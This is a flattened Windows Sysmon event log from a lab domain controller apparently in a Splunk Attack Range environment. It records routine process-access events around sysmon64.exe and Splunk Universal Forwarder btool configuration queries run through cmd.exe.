13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.970{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.936{59A5CD1D-8EE3-6005-BA00-00000000A301}13721752C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B900-00000000A301}11881200C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.682{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 